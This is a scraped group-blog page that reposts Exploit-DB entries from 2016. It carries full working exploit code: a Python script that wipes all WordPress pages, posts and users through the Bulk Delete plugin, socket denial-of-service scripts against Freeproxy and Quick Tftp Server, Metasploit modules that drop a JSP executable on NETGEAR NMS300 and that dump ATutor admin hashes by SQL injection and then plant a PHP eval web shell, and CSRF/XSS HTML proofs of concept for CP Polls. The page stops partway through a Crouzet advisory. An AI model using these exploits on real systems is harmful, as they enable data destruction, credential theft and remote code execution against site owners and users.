'''
* Exploit Title: WordPress Bulk Delete Plugin [Privilege Escalation]
* Discovery Date: 2016-02-10
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://bulkwp.com/
* Software Link: https://wordpress.org/plugins/bulk-delete/
* Version: 5.5.3
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
_Bulk Delete_ plugin for WordPress suffers from a privilege escalation
vulnerability. Any registered user can exploit the lack of capabilities
checks to perform all administrative tasks provided by the _Bulk Delete_
plugin. Some of these actions, but not all, are:
- `bd_delete_pages_by_status`: deletes all pages by status
- `bd_delete_posts_by_post_type`: deletes all posts by type
- `bd_delete_users_by_meta`: delete all users with a specific pair of
meta name, meta value
Nearly all actions registered by this plugin can be performed from any
user, as long as they passed to a query var named `bd_action` and the
user has a valid account. These actions would normally require
administrative wrights, so we can consider this as a privilege
escalation vulnerability.
PoC
---
The following script will delete all pages, posts and users from the
infected website.
'''
#!/usr/bin/python3
################################################################################
# Bulk Delete Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it will
# delete nearly all your sites content
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################
import requests
loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'
loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
l = requests.post(loginUrl, data=loginPostData)
if l.status_code != 200 or len(l.history) == 0 or
len(l.history[0].cookies) == 0:
print("Couldn't acquire a valid session")
exit(1)
loggedInCookies = l.history[0].cookies
def do_action(action, data):
try:
requests.post(
adminUrl + '?bd_action=' + action,
data=data,
cookies=loggedInCookies,
timeout=30
)
except TimeoutError:
print('Action ' + action + ' timed out')
else:
print('Action ' + action + ' performed')
print('Deleting all pages')
do_action(
'delete_pages_by_status',
{
'smbd_pages_force_delete': 'true',
'smbd_published_pages': 'published_pages',
'smbd_draft_pages': 'draft_pages',
'smbd_pending_pages': 'pending_pages',
'smbd_future_pages': 'future_pages',
'smbd_private_pages': 'private_pages',
}
)
print('Deleting all posts from all default post types')
do_action('delete_posts_by_post_type', {'smbd_types[]': [
'post',
'page',
'attachment',
'revision',
'nav_menu_item'
]})
print('Deleting all users')
do_action(
'delete_users_by_meta',
{
'smbd_u_meta_key': 'nickname',
'smbd_u_meta_compare': 'LIKE',
'smbd_u_meta_value': '',
}
)
exit(0)
'''
Solution
--------
Upgrade to v5.5.4
Timeline
--------
1. **2016-02-10**: Requested CVE ID
2. **2016-02-10**: Vendor notified through wordpress.org support forums
3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com
4. **2016-02-10**: Vendor responded and received details about the issue
5. **2016-02-10**: Vendor verified vulnerability
6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue
'''
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863593580
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://github.com/Cr4sh/secretnet_expl
Secret Net 7 and Secret Net Studio 8 local privileges escalation exploit.
0day vulnerabilities in sncc0.sys kernel driver of Secrity Code products allows attacker to perform local privileges escalation from Guest to Local System. Also, attacker that has access to any Windows system may manually install sncc0.sys (that has valid digital signature from Security Code) and exploit it's vulnerability to bypass DSE and load unsigned kernel mode drivers on Windows x64 platforms.
For detailed vulnerability analysis and explanation of how sncc0_00220010_expl code works please read Windows DSE bypass part of my article "Exploiting SMM callout vulnerabilities in Lenovo firmware".
This exploit was tested with 64-bit versions of Windows 7, 8, 8.1 and 10. On SMEP enabled systems you have to manually restore original value of CR4 register to avoid PatchGuard bugchecks, for real life usage example please check my fwexpl project.
Proof of Concept:
https://github.com/Cr4sh/secretnet_expl/archive/master.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39520.zip
# Exploit Title: PictureTrail Photo Editor GE.exe 2.00 - ./bmp Crash PoC
# Date: 01-03-2016
# Exploit Author: redknight99
# Vendor Homepage: http://www.picturetrail.com/
# Software Link: http://www.picturetrail.com/downloads/photoeditor200.exe
# Version: 2.0.0
# Tested on: Windows 7, 10
# CVE : Unknown
Picture Trail Photo editor fails to properly parse .bmp header height and width values.
Negative height and width values cause a program crash (memory corruption) and SEH corruption. Remote code execution may be possible.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39518.zip
# Exploit Title: Freeproxy Internet Suite 4.10 Remote DoS
# Date: 01/03/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.handcraftedsoftware.org/
# Software Link: http://www.handcraftedsoftware.org/index.php?page=download&op=getFile&id=2&title=FreeProxy-Internet-Suite
# Version: 4.10.1751
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-01-29: Vulnerability discovered
2016-01-30: Vendor contacted
2016-03-01: Vulnerability published
Description :
-------------
A remote Denial Of Service exists in Freeproxy Internet Suite 4.10.1751 when sending a GET request to the proxy with an overly long URL.
Instructions:
-------------
- Starts Freeproxy Internet Suite
- Run this exploit locally or from your remote attacking machine. Multiple sends may be necessary to crash the application.
"""
import socket
host = "192.168.135.132"
port = 8080
junk = '\x41' * 5000
buffer = "GET http://::../%s/index.html HTTP/1.1\r\n" % junk
buffer += "Host: www.google.fr\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
buffer += "\r\n\r\n"
try:
print "[*] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Sending buffer %d bytes..." % len(junk)
s.connect((host, port))
s.send(buffer)
s.close()
print "[*] Done."
except:
print "[-] Error connecting"
# Exploit Title: Quick Tftp Server Pro 2.3 TFTP mode Remote Overflow (DoS)
# Date: 21/01/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
# Software Link: http://www.tallsoft.com/tftpserver_setup.exe
# Version: 2.3
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-01-21: Vulnerability discovered
2016-01-24: Vendor contacted
2016-01-29: Vendor contacted again (no answer)
2016-03-01: Vulnerability published
Description :
-------------
A remote overflow exists in Quick Tftp Server Pro 2.3 in the TFTP mode when sending a TFTP Read Request. This allows to remotely crash
the application, thus causing a Denial of Service.
Instructions:
-------------
- Starts Quick Tftp Server Pro 2.3
- Run this exploit locally or from your remote attacking machine
"""
import socket
host = "192.168.135.132"
port = 69
request = "\x00\x01" # TFTP Read Request (RRQ)
file = "file.txt"
mode = '\x41' * 1024 # Overflow
buffer = request + file + "\x00" + mode + "\x00"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print "[*] Sending buffer to %s (%d bytes)..." % (host, len(buffer))
s.sendto(buffer, (host, port))
s.close()
print "[*] Done."
except:
print "[-] Error connecting"
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
'Description' => %q{
Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
The application has a file upload vulnerability that can be exploited by an
unauthenticated remote attacker to execute code as the SYSTEM user.
Two servlets are vulnerable, FileUploadController (located at
/lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
1.1.0.13.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-1525'],
['US-CERT-VU', '777024'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30']
],
'DefaultOptions' => { 'WfsDelay' => 5 },
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => true,
'Targets' =>
[
[ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 4 2016'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, "Application path", '/'])
], self.class)
end
def check
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
'method' => 'GET'
})
if res && res.code == 405
Exploit::CheckCode::Detected
else
Exploit::CheckCode::Safe
end
end
def generate_jsp_payload
exe = generate_payload_exe
base64_exe = Rex::Text.encode_base64(exe)
payload_name = rand_text_alpha(rand(6)+3)
var_raw = 'a' + rand_text_alpha(rand(8) + 3)
var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
var_buf = 'c' + rand_text_alpha(rand(8) + 3)
var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
var_tmp = 'e' + rand_text_alpha(rand(8) + 3)
var_path = 'f' + rand_text_alpha(rand(8) + 3)
var_proc2 = 'e' + rand_text_alpha(rand(8) + 3)
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
String #{var_buf} = "#{base64_exe}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
String #{var_path} = #{var_tmp}.getAbsolutePath();
BufferedOutputStream #{var_ostream} =
new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
} catch (Exception e) {
}
%>
|
jsp.gsub!(/[\n\t\r]/, '')
return jsp
end
def exploit
jsp_payload = generate_jsp_payload
jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
jsp_full_name = "null#{jsp_name}.jsp"
post_data = Rex::MIME::Message.new
post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
post_data.add_part(jsp_payload,
"application/octet-stream", 'binary',
"form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
data = post_data.to_s
print_status("#{peer} - Uploading payload...")
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
print_status("#{peer} - Payload uploaded successfully")
else
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], jsp_full_name),
'method' => 'GET'
})
handler
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution',
'Description' => %q{
This module exploits a SQL Injection vulnerability and an authentication weakness
vulnerability in ATutor. This essentially means an attacker can bypass authenication
and reach the administrators interface where they can upload malcious code.
You are required to login to the target to reach the SQL Injection, however this
can be done as a student account and remote registration is enabled by default.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code
],
'References' =>
[
[ 'CVE', '2016-2555' ],
[ 'URL', 'http://www.atutor.ca/' ] # Official Website
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Mar 1 2016',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
OptString.new('USERNAME', [true, 'The username to authenticate as']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
],self.class)
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def check
# the only way to test if the target is vuln
begin
test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end
if test_injection(test_cookie)
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def create_zip_file
zip_file = Rex::Zip::Archive.new
@header = Rex::Text.rand_text_alpha_upper(4)
@payload_name = Rex::Text.rand_text_alpha_lower(4)
@plugin_name = Rex::Text.rand_text_alpha_lower(3)
path = "#{@plugin_name}/#{@payload_name}.php"
register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}")
zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
zip_file.pack
end
def exec_code
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
})
end
def upload_shell(cookie)
post_data = Rex::MIME::Message.new
post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"")
post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => cookie,
'agent' => 'Mozilla'
})
if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla',
})
if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"),
'cookie' => cookie,
'agent' => 'Mozilla',
})
return true
end
end
# auth failed if we land here, bail
fail_with(Failure::Unknown, "Unable to upload php code")
return false
end
def get_hashed_password(token, password, bypass)
if bypass
return Rex::Text.sha1(password + token)
else
return Rex::Text.sha1(Rex::Text.sha1(password) + token)
end
end
def login(username, password, bypass)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "login.php"),
'agent' => 'Mozilla',
})
token = $1 if res.body =~ /\) \+ \"(.*)\"\);/
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/
if bypass
password = get_hashed_password(token, password, true)
else
password = get_hashed_password(token, password, false)
end
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "login.php"),
'vars_post' => {
'form_password_hidden' => password,
'form_login' => username,
'submit' => 'Login'
},
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/
# this is what happens when no state is maintained by the http client
if res && res.code == 302
if res.redirection.to_s.include?('bounce.php?course=0')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
return cookie
end
else res.redirection.to_s.include?('admin/index.php')
# if we made it here, we are admin
return cookie
end
end
# auth failed if we land here, bail
fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
return nil
end
def perform_request(sqli, cookie)
# the search requires a minimum of 3 chars
sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='"
rand_key = Rex::Text.rand_text_alpha(1)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"),
'vars_post' => {
"search_friends_#{rand_key}" => sqli,
'rand_key' => rand_key,
'search' => 'Search People'
},
'cookie' => cookie,
'agent' => 'Mozilla'
})
return res.body
end
def dump_the_hash(cookie)
extracted_hash = ""
sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)"
login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i
for i in 1..login_and_hash_length
sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))"
asciival = generate_sql_and_test(false, false, sqli, cookie)
if asciival >= 0
extracted_hash << asciival.chr
end
end
return extracted_hash.split(":")
end
def get_ascii_value(sql, cookie)
lower = 0
upper = 126
while lower < upper
mid = (lower + upper) / 2
sqli = "#{sql}>#{mid}"
result = perform_request(sqli, cookie)
if result =~ /There are \d entries./
lower = mid + 1
else
upper = mid
end
end
if lower > 0 and lower < 126
value = lower
else
sqli = "#{sql}=#{lower}"
result = perform_request(sqli, cookie)
if result =~ /There are \d entries./
value = lower
end
end
return value
end
def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie)
if do_test
if do_true
result = perform_request("1=1", cookie)
if result =~ /There are \d entries./
return true
end
else not do_true
result = perform_request("1=2", cookie)
if not result =~ /There are \d entries./
return true
end
end
elsif not do_test and sql
return get_ascii_value(sql, cookie)
end
end
def test_injection(cookie)
if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie)
if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie)
return true
end
end
return false
end
def report_cred(opts)
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: fullname,
post_reference_name: self.refname,
private_data: opts[:password],
origin_type: :service,
private_type: :password,
username: opts[:user]
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
last_attempted_at: Time.now
}.merge(service_data)
create_credential_login(login_data)
end
def exploit
student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...")
report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])
print_status("Dumping username and password hash...")
# we got admin hash now
credz = dump_the_hash(student_cookie)
print_good("Got the #{credz[0]} hash: #{credz[1]} !")
if credz
admin_cookie = login(credz[0], credz[1], true)
print_status("Logged in as #{credz[0]}, uploading shell...")
# install a plugin
if upload_shell(admin_cookie)
print_good("Shell upload successful!")
# boom
exec_code
end
end
end
end
# Exploit Title: WordPress CP Polls 1.0.8 - CSRF - Update poll settings & Persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
=============
Description
=============
With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results.
You can receive email notifications every time a vote is added or opt to receive Excel reports periodically.
The Polls can have dependant questions, this means that some questions are displayed depending of the
selection made on other questions.
(copy of README.txt)
===================
Technical details
===================
CP Polls plugin for wordpress is vulnerable to Persistent Cross-site scripting is not sanitizing the
values of the options before savinng to database. This issue can be exploited by an attacker with
CSRF by sending a malicious link to a wordpress administrator. If administrator clicks the link, the
action will be executed because there isn't CSRF protection.
=========================
Proof of Concept (html)
=========================
<html>
<!-- CSRF PoC - Burp Suite i0 SecLab plugin -->
<!-- We can find the Poll id into the source code of a post with a cp poll and looking for ´CP_Polls_id´.
We can find something like: <input type="hidden" name="CP_Polls_id" value="4" />
4 is the Poll's id, now we have the id and we can make a csrf attack.
-->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:80/wordpress/wp-admin/options-general.php?page=CP_Polls&cal=1", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
xhr.withCredentials = true;
var body = "CP_Polls_post_options=1&CP_Polls_id= [ Poll id to update! ]&poll_limit=2&poll_private_reports=false&poll_see_results=true&poll_text_seeres= [PERSISTENT CODE INJECT HERE] &poll_text_private=s&poll_text_votes=votes&fp_return_page=&form_structure=%5B%5B%7B%22form_identifier%22%3A%22%22%2C%22name%22%3A%22fieldname1%22%2C%22shortlabel%22%3A%22%22%2C%22index%22%3A0%2C%22ftype%22%3A%22fradio%22%2C%22userhelp%22%3A%22%22%2C%22userhelpTooltip%22%3Afalse%2C%22csslayout%22%3A%22%22%2C%22title%22%3A%22Select+a+Choice%22%2C%22layout%22%3A%22one_column%22%2C%22required%22%3Atrue%2C%22choiceSelected%22%3A%22%22%2C%22showDep%22%3Afalse%2C%22choices%22%3A%5B%22First+Choice%22%2C%22Second+Choice%22%2C%22Third+Choice%22%5D%2C%22choicesVal%22%3A%5B%22First+Choice%22%2C%22Second+Choice%22%2C%22Third+Choice%22%5D%2C%22choicesDep%22%3A%5B%5B%5D%2C%5B%5D%2C%5B%5D%5D%2C%22fBuild%22%3A%7B%7D%7D%5D%2C%5B%7B%22title%22%3A%22 [PERSISTENT CODE INJECT HERE] %22%2C%22description%22%3A%22 [PERSISTENT CODE INJECT HERE] %22%2C%22formlayout%22%3A%22top_aligned%22%2C%22formtemplate%22%3A%22%22%7D%5D%5D&vs_text_submitbtn= [PERSISTENT CODE INJECT HERE] &vs_text_previousbtn=Previous&vs_text_nextbtn=Next&vs_use_validation=true&vs_text_is_required=This+field+is+required.&cv_text_enter_valid_captcha= [PERSISTENT CODE INJECT HERE] .&vs_text_is_email=Please+enter+a+valid+email+address.&vs_text_datemmddyyyy=Please+enter+a+valid+date+with+this+format%28mm%2Fdd%2Fyyyy%29&vs_text_dateddmmyyyy=Please+enter+a+valid+date+with+this+format%28dd%2Fmm%2Fyyyy%29&vs_text_number=Please+enter+a+valid+number.&vs_text_digits=Please+enter+only+digits.&vs_text_max=Please+enter+a+value+less+than+or+equal+to+%7B0%7D.&vs_text_min=Please+enter+a+value+greater+than+or+equal+to+%7B0%7D.&fp_emailfrommethod=fixed&fp_from_email=admin%40localhost.com&fp_destination_emails=admin%40localhost.com&fp_subject=Contact+from+the+blog...&fp_inc_additional_info=true&fp_emailformat=text&fp_message=The+following+contact+message+has+been+sent%3A%0D%0A%0D%0A%3C%25INFO%25%3E%0D%0A%0D%0A&cu_enable_copy_to_user=false&cu_subject=Confirmation%3A+Message+received...&cu_emailformat=text&cu_message=Thank+you+for+your+message.+We+will+reply+you+as+soon+as+possible.%0D%0A%0D%0AThis+is+a+copy+of+the+data+sent%3A%0D%0A%0D%0A%3C%25INFO%25%3E%0D%0A%0D%0ABest+Regards.&cv_enable_captcha=false&cv_width=170&cv_height=60&cv_chars=5&cv_min_font_size=25&cv_max_font_size=35&cv_noise=200&cv_noise_length=4&cv_background=ffffff&cv_border=000000&cv_font=font-1.ttf&rep_enable=no&rep_days=1&rep_hour=0&rep_emails=&rep_subject=as&rep_emailformat=text&rep_message=Attached+you+will+find+the+data+from+the+form+submissions.&submit=Save+Changes";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
################################################################################
# Exploit Title: WordPress CP Polls 1.0.8 - Reflected file download (.bat file)
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
# Demo: https://www.youtube.com/watch?v=uc6P59BPEkU
===================
Technical details
===================
CP Polls plugin for wordpress is prone to file download issue. A hacker is able to attack an administrator by
exploiting a CSRF in the 'change cp poll name' converting the downloadable report file (csv) to a malicious .bat file.
Because there is not restriction in the cp poll name the CSRF exploit can change the name to ...
malicious.bat;
The semicolon (;) character must be restricted because the header 'Content-Disposition' uses this characteer as a
parameter delimitation. For example, when we change the name of a cp poll to 'malicious.bat;' when an administrator
download the report (thinking that is a csv file) the response header turns:
""
Content-Disposition: attachment; file=malicious.bat;.csv
""
the csv is ignored and the administrator gets a .BAT file
So, how to exploit this vulnerability to execute commands on the victim's machine?
Whe have an option. If the cp_poll is added in a post we can vote them and we can inject our malicious payload
into a votation.
==============================
Proof of Concept CSRF (html)
==============================
https://www.youtube.com/watch?v=uc6P59BPEkU
==========================
If the csrf attack is succesful, we only need to inject our commands in votations. In ´fieldnames´ post parameter
we can inject our commands.
################################################################################
# Exploit Title: WordPress CP Polls 1.0.8 - Cross-site file upload & persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
===================
Technical details
===================
CP Polls plugin for wordpress is prone to persistent XSS via cross-site file upload.
When we register an cp_poll, it is sanitized correctly but when we upload a CSV file, we can
bypass the protection and inject malicious HTML/Javascript.
There are not CSRF protection in that action so it can be exploited with a CSRF attack by sending a
malicious link to a victim (administrator) a wait for execution of the malicious request.
=========================
Proof of Concept (html)
=========================
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://<wp.host>/wp-admin/admin.php?page=CP_Polls&cal=1&list=1&import=1", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------17460754011784");
xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
xhr.withCredentials = true;
var body = "-----------------------------17460754011784\r\n" +
"Content-Disposition: form-data; name=\"importfile\"; filename=\"csv.csv\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"2013-04-21 18:50:00, 192.168.1.12, <img src=x onerror=alert('You_are_owned!')>,
\"<img src=x onerror=alert('I am scared!')>\", \"sample subject\", \"\"\r\n" +
"-----------------------------17460754011784\r\n" +
"Content-Disposition: form-data; name=\"pbuttonimport\"\r\n" +
"\r\n" +
"Import\r\n" +
"-----------------------------17460754011784--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
========
TIMELINE
========
2016-02-10 vulnerability discovered
2016-02-22 reported to vendor
2016-03-01 released cp polls v1.0.9
2016-03-01 public disclousure
# Exploit Title: Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs
# Date: 01-03-2016
# Exploit Author: Shantanu Khandelwal Twitter: @shantanu561993 <shantanu561993@gmail.com>
# Vendor Homepage: http://www.viscomsoft.com/
# Software Link: http://www.viscomsoft.com/downloads/calendar.html
# Version: 2.0
# Tested on: Windows XP IE-8 , Windows 7 IE-8
Multiple Vulnerabilities found in calender.ocx file
Multiple Access violations
POC:
https://www.dropbox.com/s/rtakkmw9ru55lbn/CALENDARLib.zip?dl=0
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39512.zip
Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 Insecure File Permissions
Vendor: Crouzet Automatismes SAS
Product web page: http://www.crouzet-automation.com
Affected version: em4 soft (1.1.04 and 1.1.03.01)
M3 soft (3.1.2.0)
Summary: em4 is more than just a nano-PLC. It is a leading
edge device supported by best-in-class tools that enables
you to create and implement the smartest automation applications.
Millenium 3 (M3) is easy to program and to implement, it enables
the control and monitoring of machines and automation installations
with up to 50 I/O. It is positioned right at the heart of the
Crouzet Automation range.
